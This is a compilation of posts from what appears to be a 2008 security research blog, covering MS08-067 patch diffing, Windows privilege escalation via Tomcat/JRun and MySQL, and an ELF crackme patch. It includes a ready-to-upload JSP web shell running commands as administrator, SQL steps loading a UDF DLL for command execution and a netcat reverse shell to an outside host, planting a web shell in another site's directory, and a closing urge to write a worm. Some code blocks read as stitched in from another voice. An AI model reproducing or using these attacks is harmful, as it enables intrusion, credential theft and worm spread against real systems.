Microsoft Patch Analysis (binary diffing)

hello again to all our patient readers

It has been a long time since our last post. First of all, sorry for the delay in blog updates. We have been busy finishing our projects, we moved to a new server, and we started Abysssec Inc. with a professional team for new projects and services. There will be plenty of good news soon that may interest you, so please be patient and watch for it on our new index page (coming as soon as possible).

===================================================================

Today I want to talk about analysing Microsoft security patches. As you know, this year, and especially its last months, was a nightmare for Windows: we saw MS08-067, MS08-068, MS08-006, MS08-001 and others. You also know that the publication of real, working exploits is dying out; what you can get on time are commercial exploits.

I saw this picture in one of Nicolas Waisman's presentations and I believe in the point it makes:

My point with this introduction is that if you want an exploit at publication time you have only two choices:

1- write your own exploit

2- buy a commercial exploit for the vulnerability you need

- if you are a super-millionaire you can buy all the commercial exploits from the various security research teams, and we are one of them ;)

- if you are not, and you need an exploit on time, you have to write your own. Writing exploits for modern operating systems is not easy because you need to bypass a dozen memory protections (DEP, ASLR, SafeSEH, safe unlinking and so on), from the OS up to the commercial target software. I also believe this sentence from Dave Aitel: not only are bugs expensive, but the techniques for reliably exploiting bugs become expensive.

Anyway, becoming a real exploit coder is not easy, but it is possible, and I should quote another piece here: Modern Exploits – Do You Still Need To Learn Assembly Language (ASM)? (you can read the full post here: http://www.darknet.org.uk/2008/09/modern-exploits-do-you-still-need-to-learn-assembly-language-asm/)

I am fully sure that learning assembly language will help you at every level of exploit development, from reversing and understanding the vulnerability to writing reliable exploit code for modern operating systems.

Once you can read assembly you can infer the high-level code behind it, and from there identify the vulnerability from the discrepancy between the patched and unpatched binaries (advanced tools and IDA plugins make life easier, and you can identify the vulnerable code or function in a few minutes). This technique is called binary diffing. In the future I will discuss a few advanced tricks and methods that improve your speed and analysis, but for now I will only cover the basics of binary diffing on Microsoft security patches.

The first step is downloading the patch from Microsoft. The best way is to search the Microsoft site for your target bulletin, for example MS08-067 (my favourite bug of this year :D).

You just need to click on your target OS and download the patch.

After downloading the patch, do not install it; extract its contents instead with the /x switch. For example, extracting the MS08-067 patch:

The command above extracts all the data inside the patch. In this example the result is:

As you can see, this patch contains just one file, a DLL named netapi32.dll (the package carries a copy per service pack and GDR/QFE branch, so pick the one that matches the unpatched binary on your system), so we know the vulnerable function is in this DLL.

The next step is to find the vulnerable (unpatched) file or files on your system. Rename the patched copy to filename_patched.XXX, then analyse both and note the changes between the patched and unpatched files.

You can use different tools and approaches for this, but IDA Pro is one of the best and most logical. You can spot the changes without any plugins or auxiliary tools, but to improve speed and get better results you have three choices.

1- BinDiff (a commercial IDA plugin, and the best auxiliary tool for this analysis).

For example, see the patch analysis video for MS08-001 (TCP/IP kernel pool overflow) here:

http://www.zynamics.com/files/ms08001.swf

2- eEye DiffingSuite. I like this tool because it is really easy to use and effective.

You can download it from the following link:

http://research.eeye.com/html/Tools/download/DiffingSuiteSetup.exe

There are also three good videos analysing different patches with this tool:

- analysing MS06-033: http://research.eeye.com/html/tools/tutorials/BDS_v_MS06-033.htm

- analysing MS06-007: http://research.eeye.com/html/tools/tutorials/MS06-007.htm

- analysing MS06-036: http://research.eeye.com/html/tools/tutorials/MS06-036%20Analysis.htm

After the videos, please read the following post by Stephen Lawler, a full reverse of the MS08-067 patch using DiffingSuite and IDA Pro; it covers the bulk of the work:

http://www.dontstuffbeansupyournose.com/?p=35

3- Tenable Security's PatchDiff. PatchDiff is another IDA Pro plugin (like BinDiff), with one big difference: it is free!

There is a video about this plugin here:

http://cgi.tenablesecurity.com/tenable/pdiff2.swf.html

and you can download the plugin from the following link:

http://cgi.tenablesecurity.com/tenable/dl.php?p=patchdiff2-2.0.5.zip

Using the plugin is easy, but I will say a little about it. First you need the patched and unpatched binaries. Open the unpatched binary in IDA and save the disassembly to an IDB file, then open the patched binary and save its disassembly to another IDB:

After that, open the unpatched IDB and run the plugin against the patched IDB to see the discrepancies. As Nicolas Pouvesle (the PatchDiff author) explains, graph nodes can be synchronized by double-clicking on a given node. Graphs use the following colors:

  • white: identical nodes
  • grey: unmatched nodes
  • red: matched nodes
  • tan: identical nodes (different crc)

For example, here is the PatchDiff result for the MS08-067 patch:

and :

If you are smart you can write a high-level simulation of the vulnerable function. For example, Alexander Sotirov wrote a simulator of the vulnerable function:


#include <stddef.h>
#include <wchar.h>

// This is the decompiled function sub_5B86A51B in netapi32.dll on XP SP3
// and sub_6EA11D4D on Vista SP1

int ms08_067(wchar_t* path)
{
    wchar_t* p;
    wchar_t* q;
    wchar_t* previous_slash = NULL;
    wchar_t* current_slash = NULL;
    wchar_t ch;

#ifdef VISTA
    int len = wcslen(path);
    wchar_t* end_of_path = path + len;
#endif

    // If the path starts with a server name, skip it

    if ((path[0] == L'\\' || path[0] == L'/') &&
        (path[1] == L'\\' || path[1] == L'/'))
    {
        p = path+2;

        while (*p != L'\\' && *p != L'/') {
            if (*p == L'\0')
                return 0;
            p++;
        }

        p++;

        // make path point after the server name

        path = p;

        // make sure the server name is followed by a single slash

        if (path[0] == L'\\' || path[0] == L'/')
            return 0;
    }

    if (path[0] == L'\0') // return if the path is empty
        return 1;

    // Iterate through the path and canonicalize ..\ and .\

    p = path;

    while (1) {
        if (*p == L'\\') {
            // we have a slash

            if (current_slash == p-1) // don't allow consecutive slashes
                return 0;

            // store the locations of the current and previous slashes

            previous_slash = current_slash;
            current_slash = p;
        }
        else if (*p == L'.' && (current_slash == p-1 || p == path)) {
            // we have \. or ^.

            if (p[1] == L'.' && (p[2] == L'\\' || p[2] == L'\0')) {
                // we have a \..\, \..$, ^..\ or ^..$ sequence

                if (previous_slash == NULL)
                    return 0;

                // example: aaa\bbb\..\ccc
                //             ^   ^  ^
                //             |   |  &p[2]
                //             |   |
                //             |   current_slash
                //             |
                //             previous_slash

                ch = p[2];

#ifdef VISTA
                if (previous_slash >= end_of_path)
                    return 0;

                wcscpy_s(previous_slash, (end_of_path-previous_slash)/2, p+2);
#else // XP
                wcscpy(previous_slash, &p[2]);
#endif

                if (ch == L'\0')
                    return 1;

                current_slash = previous_slash;
                p = previous_slash;

                // find the slash before p

                // BUG: if previous_slash points to the beginning of the
                // string, we'll go beyond the start of the buffer
                //
                // example string: \a\..\

                q = p-1;

                while (*q != L'\\' && q != path)
                    q--;

                if (*p == L'\\')
                    previous_slash = q;
                else
                    previous_slash = NULL;
            }
            else if (p[1] == L'\\') {
                // we have \.\ or ^.\

#ifdef VISTA
                if (current_slash != NULL) {
                    if (current_slash >= end_of_path)
                        return 0;
                    wcscpy_s(current_slash, (end_of_path-current_slash)/2, p+2);
                    goto end_of_loop;
                }
                else { // current_slash == NULL
                    if (p >= end_of_path)
                        return 0;
                    wcscpy_s(p, (end_of_path-p)/2, p+2);
                    goto end_of_loop;
                }
#else // XP
                if (current_slash != NULL) {
                    wcscpy(current_slash, p+2);
                    goto end_of_loop;
                }
                else { // current_slash == NULL
                    wcscpy(p, p+2);
                    goto end_of_loop;
                }
#endif
            }
            else if (p[1] != L'\0') {
                // we have \. or ^. followed by some other char

                if (current_slash != NULL) {
                    p = current_slash;
                }
                *p = L'\0';
                return 1;
            }
        }

        p++;

end_of_loop:
        if (*p == L'\0')
            return 1;
    }
}

// Run this program to simulate the MS08-067 vulnerability
// (the path lives in a writable array because the function modifies it
// in place; a string literal may sit in read-only memory)

int main()
{
    wchar_t path[] = L"\\c\\..\\..\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    return ms08_067(path);
}
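The BUG comment in the simulator is the whole vulnerability, so here is an added example (my own code, not Sotirov's simulator and not netapi32) that isolates the backward slash search and puts a bounds-checked form next to it. It reproduces the state after the first ..\ of \c\..\..\AAAA has been collapsed, when previous_slash points at the very start of the string, and it places the string behind a constructed guard region inside one array so that the out-of-bounds read hits memory the program owns and can inspect. The guard is filled with backslashes, an assumption that makes the vulnerable walk stop after a single bad read; real stack contents below the buffer could send it much further down. The fixture, the sizes and the function names are all mine:

```c
#include <stdio.h>
#include <stddef.h>
#include <wchar.h>

/* Added example, not code from netapi32.dll or from Sotirov's simulator.
 * Constructed fixture: a guard region followed by the path, in one array,
 * so that reading below the path is still inside memory we own. */

#define GUARD_LEN 8
#define PATH_LEN  32
#define TOTAL_LEN (GUARD_LEN + PATH_LEN)

/* Fill the guard with backslashes and copy the test path after it.
 * A backslash directly below the string stops the vulnerable walk after
 * one bad read; any other content would make it keep walking down. */
static wchar_t *fixture_init(wchar_t *buf, const wchar_t *s)
{
    wchar_t *path = buf + GUARD_LEN;
    for (size_t i = 0; i < GUARD_LEN; i++)
        buf[i] = L'\\';
    wcsncpy(path, s, PATH_LEN - 1);
    path[PATH_LEN - 1] = L'\0';
    return path;
}

/* Vulnerable form: the same loop as the XP decompilation. q is
 * dereferenced before it is compared with path, so when p == path the
 * very first read is at path[-1] and the returned pointer may lie below
 * the buffer. */
static wchar_t *prev_slash_vuln(wchar_t *path, wchar_t *p)
{
    wchar_t *q = p - 1;
    while (*q != L'\\' && q != path)
        q--;
    return q;
}

/* Hardened form: no earlier component exists when p is already at the
 * start of the string, and the bound is tested before each read.
 * Returns NULL instead of a pointer outside [path, p). */
static wchar_t *prev_slash_safe(wchar_t *path, wchar_t *p)
{
    wchar_t *q;
    if (p <= path)
        return NULL;
    for (q = p - 1; q > path && *q != L'\\'; q--)
        ;
    return q;
}

/* State after the first "..\" of "\c\..\..\AAAA" was collapsed: the buffer
 * holds "\..\AAAA" and previous_slash == path. Returns the offset, in
 * wchar_t units, of the pointer the vulnerable walk yields; a negative
 * value means it escaped below the path. */
long vuln_prev_slash_offset(void)
{
    wchar_t buf[TOTAL_LEN];
    wchar_t *path = fixture_init(buf, L"\\..\\AAAAAAAA");
    wchar_t *q = prev_slash_vuln(path, path);
    return (long)(q - path);
}

/* Same state with the hardened walk: the caller gets NULL and can fail
 * the request instead of continuing with a pointer it cannot trust. */
int safe_prev_slash_is_null(void)
{
    wchar_t buf[TOTAL_LEN];
    wchar_t *path = fixture_init(buf, L"\\..\\AAAAAAAA");
    return prev_slash_safe(path, path) == NULL;
}

/* Follow the bad pointer the way the next "..\" iteration does:
 * wcscpy(previous_slash, &p[2]) with p on the '.' at path[1]. The copy
 * starts one wchar_t below the string, so the text shifts down into the
 * guard and path[0] is no longer the leading backslash. wmemmove stands
 * in for wcscpy so the demo itself stays well-defined on overlap. */
int vuln_copy_shifts_string_down(void)
{
    wchar_t buf[TOTAL_LEN];
    wchar_t *path = fixture_init(buf, L"\\..\\AAAAAAAA");
    wchar_t *prev = prev_slash_vuln(path, path);
    wchar_t *rest = path + 3;                  /* &p[2] == "\\AAAAAAAA" */
    if (prev != path - 1)
        return 0;
    wmemmove(prev, rest, wcslen(rest) + 1);    /* write begins at path[-1] */
    return path[0] == L'A';
}

int main(void)
{
    printf("vulnerable walk returned offset %ld\n", vuln_prev_slash_offset());
    printf("hardened walk returned NULL: %d\n", safe_prev_slash_is_null());
    printf("copy through the bad pointer shifted the string down: %d\n",
           vuln_copy_shifts_string_down());
    return 0;
}
```

The vulnerable walk returns a pointer one wchar_t below the string, the hardened one returns NULL, and following the bad pointer the way the next ..\ iteration does shifts the whole string one position down into the guard. In the real function that position is whatever sits below the stack buffer, which is why the second ..\ in Sotirov's test path is the one that corrupts memory.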

The final steps are identifying the vulnerable function, understanding its parameters, and writing a PoC that controls EIP.

For example, Stephen Lawler wrote a C program to check for MS08-067 by calling the function directly at its offset from the load address of NETAPI32.DLL (sub_7CDDB23D minus the 0x7CDC0000 base, i.e. 0x1b23d, on the build he analysed):


#include <windows.h>
#include <stdio.h>

// usage: prog.exe <path to netapi32.dll> <path string to canonicalize>
// Calls the canonicalization routine at base + 0x1b23d with an
// attacker-controlled buffer. The offset is specific to the build of
// netapi32.dll that was analysed.
int wmain(int argc, wchar_t **argv)
{
    HMODULE netapi32;
    void (__stdcall *foo)(PWCHAR);
    WCHAR buf[4096];

    if (argc < 3)
        return 1;

    netapi32 = LoadLibraryW(argv[1]);
    if (netapi32 == NULL)
        return 1;

    *(PVOID*)&foo = (PVOID)(((PUCHAR)netapi32) + 0x1b23d);

    //__asm { int 3 }

    wcscpy(buf, argv[2]);

    foo(buf);

    wprintf(L"%s\n", buf);
    return 0;
}

And finally he got a crash:

After the first crash you just need to take control of EIP and write the exploit for the vulnerability.

Finally, sorry for the disheveled writing; the reason is the size of this subject. In the next post I will talk directly about patch analysis tricks and analyse another interesting Microsoft patch step by step.

thank you for your time and attention

best regards

shahin.r

Tomcat & Jrun Privilege Escalation (Windows)

In the name of God.

Hello my friends and all readers,

When Tomcat (JSP) or JRun (ColdFusion), and some other HTTP servers, run JSP code on Windows, an attacker can escalate privileges.

The difference is not in the kernels of Windows and Linux but in how the server process is started on each platform: installed as a Windows service, Tomcat and JRun default to the LocalSystem account, while on Linux the server normally runs as a dedicated, unprivileged user.

Example vulnerable software: Plesk and many other web management systems that bundle these servers; you can find them easily.

TOMCAT : [http://tomcat.apache.org/]

Jrun : [http://www.adobe.com/products/jrun/]

Diagram of running a web application on Windows (note user mode and kernel mode):

Diagram of running a web application on Linux (note user mode and kernel mode):

Please look at the diagrams. I don't mean to describe the Windows and Linux kernels; the point is that in both cases the server and your application run in user mode, never face to face with the kernel, and what differs is the account the service is started under and therefore what the application is allowed to call and access.

When a JSP web application runs on Linux (with Tomcat or another server) it can only use the privileges of the user that owns and runs the server. When you run it on Windows (Tomcat or JRun) the JSP application gets the access of the jrun or tomcat service.

Those services run as Administrator (LocalSystem), so you get an Admin-level process. Running the service under a dedicated low-privilege account, as is usual on Linux, removes the escalation.

With Runtime.getRuntime().exec() in JSP you can run a process.

This is a test (detail):

<%@ page import="java.io.IOException" %>
<% Runtime.getRuntime().exec("\"c:/program files/windows/notepad.exe\""); %>

Here is one published PoC for this vulnerability.

We can run it (abysssec.jsp):

<%@ page import="java.util.*,java.io.*"%>

<%--
abysssec inc public material

just upload this file as abysssec.jsp and execute your command.
your command will run as administrator. you can download the sam file,
add a user or do anything you want.
note : please be gentle and do no harm.
vulnerability discovered by : abysssec.com

--%>

Abysssec inc (abysssec.com) JSP vulnerability<br />
<center>
<h3>JSP Privilege Escalation Vulnerability PoC</h3>
</center>
<form METHOD="GET" NAME="myform" ACTION="">
<input TYPE="text" NAME="cmd"/>
<input TYPE="submit" VALUE="Execute !"/>
</form>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd"));
    // the child inherits the service account's privileges (LocalSystem by default)
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line = reader.readLine();
    while (line != null) {
        out.println(line);
        line = reader.readLine();
    }
}
%>
</pre>

# milw0rm.com [2008-11-28]


			

Unpacking General Lame Packers

Here we go, another tutorial about unpacking general lame packers.

Hope you enjoy it.

If you are interested you can download the full tutorial from the following link:

http://rapidshare.com/files/162093080/New.rar.html

good luck and have fun

Privilege Escalation With MYSQL

GOD.

Hi. Privilege escalation on Windows (2000 to 2008) with MySQL DLLs and functions.

When you install MySQL on Windows, if you forget to set permissions on the DATA folder, an attacker can read the root password hash from the mysql database.

Example :

1- Go to:
C:\program files\mysql5.0.45\data\mysql

2- Read user.MYD

3- Crack it with Cain & Abel or any tool you have:
root*7B665519FA4B5D860C1DD4E4D40BBCB624ED2B7E

OK, you can read the data and crack it; for example, the hash above cracks to "root:123456d".

Then you can use Raptor, a critical exploit that adds a dynamic library to MySQL. This library gives you functions that behave like a trojan (reverse shell, netcat).

Summary of Raptor:
MySQL provides a mechanism by which the default set of functions can be expanded by means of custom written dynamic libraries containing User Defined Functions, or UDFs. If MySQL is installed with root privileges, the UDF mechanism allows an attacker to install and run malicious code as root.

Anyway, you can connect to MySQL with an ASP/PHP shell, phpMyAdmin or a terminal (in this example I connected with the mysql shell).

Download Raptor for Windows:

http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

c:\mysql> mysql -h 192.168.0.203

- use mysql;
- create table foo(line blob);
- insert into foo values(load_file('c:/windows/temp/winudf.dll'));
- UNLOCK TABLES;
- SELECT * FROM mysql.foo INTO DUMPFILE 'c:/windows/system32/winudf.dll';
- CREATE FUNCTION netcat RETURNS integer SONAME 'winudf.dll';
- CREATE FUNCTION exec RETURNS integer SONAME 'winudf.dll';
- DROP TABLE foo;

This needs the FILE privilege (root has it) and a mysqld that is allowed to write into system32, which is the case when the service runs as LocalSystem or an administrator. On MySQL 5.0 the DLL is found because system32 is on the loader's search path; from 5.1 on, UDF libraries are only loaded from plugin_dir, so the DUMPFILE target has to be that directory instead.

Then when you run:

select * from mysql.func;

you should see the two functions listed.

Now you can run commands with administrator privilege, for example:

mysql> select exec('echo foo > c:\\bar.txt');
mysql> select netcat('192.168.0.147');

Technical information: why does this happen?

From MySQL 5 on there is a scheduler available, similar to SQL Agent and the job scheduler in Oracle, so it seems
we have something to run our scripting code once it is ready.
However, it is not activated by default; but we can assume we execute the backdoor using a privileged account,
so this is not a big deal.
MySQL allows the creation of procedures and functions, but there is no scripting language available, so they
are limited to SQL statements along with basic loops and conditions. Even access to disk for writing
results and reading files is limited. It seems we cannot go too far this way...
However, MySQL implements an additional feature very convenient to us: UDFs (User Defined Functions).
These let you define functions, implement them in C/C++, compile them and use them from
MySQL like any other function of the database. It is not necessary to recompile the full database, as these
functions are loaded dynamically from the plugin directory (since version 5.1) and may be used from the
database normally.

Other attack:

With root privilege in MySQL you can use load_file and DUMPFILE as a robotic arm to move files around, writing them wherever the mysqld account can write, for example a web shell into another site's document root:

- use mysql;
- create table foo(line blob);
- insert into foo values(load_file('c:/windows/temp/shell.aspx'));
- UNLOCK TABLES;
- SELECT * FROM mysql.foo INTO DUMPFILE 'e:/hosting/ebanking/shell.php';

Linux version :
http://www.0xdeadbeef.info/exploits/raptor_udf.c

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
	unsigned int		arg_count;	// number of arguments
	enum Item_result	*arg_type;	// pointer to item_result
	char 			**args;		// pointer to arguments
	unsigned long		*lengths;	// length of string args
	char			*maybe_null;	// 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
	char			maybe_null;	// 1 if func can return NULL
	unsigned int		decimals;	// for real functions
	unsigned long 		max_length;	// for string functions
	char			*ptr;		// free ptr for func data
	char			const_item;	// 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
	if (args->arg_count != 1)
		return(0);

	system(args->args[0]);

	return(0);
}

In safeguard GOD .

Daphne .

another talk about MS08-067

hi again

I am sure you know about this critical, wormable vulnerability. Immediately after it was released the Win32.Gimmiv worm appeared too. This worm uses the vulnerability and, after its first execution, runs as a Windows service. I am sure it will not be the last worm based on this vulnerability.

The vulnerability exists in the Server service's Remote Procedure Call (RPC) handling, where an attacker can cause a stack-based buffer overflow by sending a request to a vulnerable function, NetPathCanonicalize(). In this way an attacker may escalate privileges, using the named pipe \pipe\srvsvc to reach other machines over the network via the pipe's file sharing service.

Exploiting this vulnerability on Windows 2000 and XP SP1, SP2 and SP3 is really fun: just an RPC request to the srvsvc interface (UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188) to get a reliable EIP and code execution. On Windows 2000, XP SP1, and XP SP2/SP3 without DEP you only need a jmp or call through the esi or edi register to execute code.

On Windows XP SP2 and SP3 with DEP:

You can use the address of the NtSetInformationProcess call in ACGENRAL.DLL to disable DEP for the process. Of course you need scratch space (a static read/write memory location), and you can find that in ACGENRAL.DLL too.

HD Moore, independent security researcher, used this method to execute shellcode. On Windows XP SP3 you can use the same method (the per-process DEP disable in ACGENRAL.DLL), of course with a different address for the NtSetInformationProcess call.

from hdm :

The actual function we use to disable NX looks like this:

push    4                                ; ProcessInformationLength
lea     eax, [ebp+arg_0]
push    eax                              ; ProcessInformation -> arg_0
push    22h                              ; ProcessExec
push    0FFFFFFFFh                       ; ProcessHandle = current process
mov     [ebp+arg_0], 2                   ; MEM_EXECUTE_OPTION_ENABLE
call    ds:__imp__NtSetInformationProcess@16

I wrote my own reliable exploit and maybe in the future I will publish it for everyone.

And about the Gimmiv worm:

Full discussion:

http://community.ca.com/blogs/securityadvisor/archive/2008/10/27/ms08-067-wormable-vulnerability-patched.aspx

The executable WinbaseInst.exe is the worm component; you can see the worm's service after executing the binary in the following picture:

You can be sure this worm uses this vulnerability from the UUID found in basesvc.dll in %SystemRoot%\system32\wbem.

After the worm scans and finds a vulnerable system through 4b324fc8-1670-01d3-1278-5a47bf6ee188 it runs a download-and-execute shellcode, as in the following picture:

This worm uses random numbers and random servers for downloading its files. I am sure it has several compiled variants (for leaked servers and AVs). Maybe in another post I will discuss the worm completely.

You can read the full post about reversing the MS08-067 patch here:

http://www.dontstuffbeansupyournose.com

The next post will be patch analysis part 1.

For now, test your skills by writing your own worm with this vulnerability.

best regards and have nice hacking

Iranian National Code Algorithm

hello again .

I think this post will be interesting for Iranian readers. It is completely ripped from my friend Soroush Dalili's weblog. Finally, don't forget that this post and algorithm were published for educational purposes only, so the author is not held responsible if it is used for any purpose other than the one stated above.

Melli card & code

Each person in Iran has a national code which is called "Code Melli", and its algorithm is very similar to the ISBN algorithm:

The rules are:

1-  The number has 10 digits: C[1] C[2] C[3] C[4] C[5] C[6] C[7] C[8] C[9] C[10]

2-  The three leftmost digits must not be 000 (C[1]C[2]C[3] != 000)

3-  C[10] is a control digit (like the ISBN algorithm)

The formula to determine C[10] is:

Let A = (C[1]*10)+ (C[2]*9)+ (C[3]*8)+ (C[4]*7)+ (C[5]*6)+ (C[6]*5)+ (C[7]*4)+ (C[8]*3)+ (C[9]*2)

Let B = A MOD 11

If B < 2 Then C[10] = B Else C[10] = 11-B

This JavaScript function is useful for validation:

//---------------Start of Iranian national code checker function---------------

//Written by Soroush Dalili - October 2008

//--------------------------------------------------------------------------------

function IsIRNationalCode(theNum)
{
    if(theNum.length!=10)
    {
        return false;
    }
    else
    {
        if(theNum.substr(0,3)=='000') return false;

        // weighted sum of the first nine digits: C[1]*10 + C[2]*9 + ... + C[9]*2
        // (a non-digit makes the sum NaN, and every comparison below then fails)
        var check = 0;
        for(var i=0;i<9;i++)
        {
            var num = theNum.substr(i,1);
            check += num*(10-i);
        }

        var remainder = check % 11;
        var control = parseInt(theNum.substr(9,1), 10);

        // control digit equals the remainder when it is 0 or 1,
        // otherwise 11 minus the remainder
        if(remainder < 2)
        {
            return control == remainder;
        }
        else
        {
            return control == (11 - remainder);
        }
    }
}

//---------------End of Iranian national code checker function---------------

//--------------------------------------------------------------------------------

good luck and have fun

ELF Reversing , Beginner

Hey

It's me again, MrXX.
As I promised in the previous post, I am going to talk about a sample of ELF reversing.

I don't know how many people have covered this before, but this tutorial may be something strange and maybe new to learn (I have seen many cracking teams working only on Windows, because Linux is free, but every OS needs some time spent on cracking).

All the words you will read are from the author, MrXX (like the previous post).
OK, let's get started.

First we need some tools to make our way easier:
1- some program to crack
2- a GUI debugger
3- a hex editor
4- some knowledge of ASM and cracking

OK, the first thing: a program to crack.

Source Code

Compiled Project

Cracked Project

I wrote a simple crackme for this part.
The crackme is open source, he he:

#include <stdio.h>

int
main(){
    int password=123456;
    int inputpass;

    printf("Please Enter a Password to continue > ");
    scanf(" %d",&inputpass);

    if ( inputpass == password ){
        printf("\nWelcome u will able to access the Tool\n");
        printf("\n======================================\n");
        printf("\nU able Reverse the linux elf file \n");
        printf("\nKeep Good job    \n");
        printf("\n======================================\n");
    }
    else
    {
        printf("\nBAD Password\n");
    }

    return(0);
}

You can see in the code that we have an IF statement that compares two values.
First, the password is 123456.
If the user input equals the password, show the good message; if not, show the bad message.
OK, I compiled it earlier, executed it and saw the prompt:
Please Enter a Password to continue > 123
I entered a wrong code and saw the bad message.

Bad Message

Now, how can I see the good message?
Let's start some reversing.
2- I need the GUI debugger (why? because I have used Windows debuggers like Olly or IDA for a long time and now I am addicted to the GUI).
OK, that isn't a problem (but don't be lazy like me; you should use a command-line debugger, and there are many).
I went and got the Zero Debugger from
http://www.zero-bugs.com
(this is one of the Linux apps that needs to be cracked, and I will release the patch for it later).
I started my Ubuntu Linux (because I use the Ubuntu version of Zero Debugger), installed Zero Debugger (it needs some packages to be installed) and ran it.
From Zero Debugger's File > Execute menu I opened my ELF file and saw the disassembly view of the ELF.

ZeroDebugger

I scroll down some lines and see the CMP (compare), and on the line under it I see the JNZ; yeah, that looks good (4- this is where you need some knowledge of ASM and cracking).
I wrote down the line: 08048406 75 52   jnz 0x804845a
This is fine for a first crackme; we don't need to follow the jump and see what is inside, because the crackme is simple.

3- Now I need to edit that line and change the bytes 75 52 to 74 52. That turns jnz into jz, so the check is inverted: a wrong password now shows the good message and the real password shows the bad one; replacing both bytes with 90 90 (two nops) would instead fall through to the good message for any input.
OK, I start the hexedit program.

HexEditing

Go to line 00000400, find offset 406 (remember 08048406) and change 75 to 74. The file offset here is just the address minus the 0x08048000 base, because this binary's text segment is loaded from file offset 0 at 0x08048000; when that is not the case, compute the offset from the PT_LOAD program header as vaddr - p_vaddr + p_offset.
I save the file as the cracked crackme and execute it again.
I enter a wrong code again and see, yeah, the good message.

Good Message

We were able to reverse the ELF file.
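As an added example (my own code, not part of MrXX's tutorial), the following C program does the address-to-offset step the tutorial did by hand and generalizes it: it reads the ELF32 program headers, maps a virtual address to the file offset through the PT_LOAD segment that covers it, and flips the jnz (0x75) at that address to jz (0x74) only after checking the opcode, so a wrong address cannot silently corrupt the binary. The ELF image it operates on is a constructed minimal header with the crackme's 75 52 bytes at offset 0x406, not the real crackme, and it assumes a little-endian host since the headers are read with memcpy:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example, not from the tutorial. Maps an ELF32 virtual address to
 * its file offset via the PT_LOAD segments and patches jnz -> jz there.
 * The image below is a constructed minimal header, not the real crackme;
 * a little-endian host is assumed because headers are read with memcpy. */

#define PT_LOAD   1
#define IMG_LEN   0x500
#define JNZ_VADDR 0x08048406u

/* ELF32 header and program header written out by hand (no <elf.h>). */
struct elf32_ehdr {
    uint8_t  e_ident[16];
    uint16_t e_type, e_machine;
    uint32_t e_version, e_entry, e_phoff, e_shoff, e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
};
struct elf32_phdr {
    uint32_t p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align;
};

/* Returns the file offset for vaddr, or -1 if the image is not ELF32, a
 * header does not fit in the buffer, or no PT_LOAD's file-backed part
 * covers the address (offset = vaddr - p_vaddr + p_offset). */
long elf32_vaddr_to_offset(const uint8_t *img, size_t len, uint32_t vaddr)
{
    static const uint8_t magic[4] = { 0x7f, 'E', 'L', 'F' };
    struct elf32_ehdr eh;
    if (len < sizeof eh)
        return -1;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, magic, 4) != 0 || eh.e_ident[4] != 1)   /* ELFCLASS32 */
        return -1;
    if (eh.e_phentsize < sizeof(struct elf32_phdr))
        return -1;
    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        struct elf32_phdr ph;
        size_t off = (size_t)eh.e_phoff + (size_t)i * eh.e_phentsize;
        if (off + sizeof ph > len)
            return -1;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type != PT_LOAD)
            continue;
        if (vaddr >= ph.p_vaddr && vaddr - ph.p_vaddr < ph.p_filesz) {
            uint64_t fo = (uint64_t)ph.p_offset + (vaddr - ph.p_vaddr);
            return fo < len ? (long)fo : -1;
        }
    }
    return -1;
}

/* Turn the short jnz at vaddr into jz. Refuses when the byte there is not
 * 0x75. Returns the patched file offset, or -1. */
long patch_jnz_to_jz(uint8_t *img, size_t len, uint32_t vaddr)
{
    long off = elf32_vaddr_to_offset(img, len, vaddr);
    if (off < 0 || img[off] != 0x75)
        return -1;
    img[off] = 0x74;
    return off;
}

/* Constructed image: one PT_LOAD mapping file offset 0 at 0x08048000 and
 * the crackme's "75 52  jnz 0x804845a" bytes at file offset 0x406. */
static uint8_t g_img[IMG_LEN];

static void build_test_image(void)
{
    struct elf32_ehdr eh = { {0} };
    struct elf32_phdr ph = { 0 };
    memset(g_img, 0, IMG_LEN);
    eh.e_ident[0] = 0x7f; eh.e_ident[1] = 'E'; eh.e_ident[2] = 'L'; eh.e_ident[3] = 'F';
    eh.e_ident[4] = 1; eh.e_ident[5] = 1; eh.e_ident[6] = 1;      /* 32-bit, LSB, v1 */
    eh.e_type = 2; eh.e_machine = 3; eh.e_version = 1;           /* ET_EXEC, EM_386 */
    eh.e_entry = 0x08048400; eh.e_phoff = sizeof eh; eh.e_ehsize = sizeof eh;
    eh.e_phentsize = sizeof ph; eh.e_phnum = 1;
    ph.p_type = PT_LOAD; ph.p_offset = 0; ph.p_vaddr = ph.p_paddr = 0x08048000;
    ph.p_filesz = ph.p_memsz = IMG_LEN; ph.p_flags = 5; ph.p_align = 0x1000;   /* R+X */
    memcpy(g_img, &eh, sizeof eh);
    memcpy(g_img + sizeof eh, &ph, sizeof ph);
    g_img[0x406] = 0x75; g_img[0x407] = 0x52;
}

/* Build the image and patch the crackme's jump: 0x406 on success. */
long demo_patch_crackme(void)
{
    build_test_image();
    return patch_jnz_to_jz(g_img, IMG_LEN, JNZ_VADDR);
}

/* After the patch the two bytes read 74 52 (jz, same displacement). */
int demo_bytes_are_jz(void)
{
    return g_img[0x406] == 0x74 && g_img[0x407] == 0x52;
}

/* A second attempt on the same image is refused: no jnz is left there. */
long demo_second_patch_refused(void)
{
    return patch_jnz_to_jz(g_img, IMG_LEN, JNZ_VADDR);
}

/* An address below the segment maps to no file offset. */
long demo_unmapped_vaddr(void)
{
    return elf32_vaddr_to_offset(g_img, IMG_LEN, 0x08040000u);
}
```

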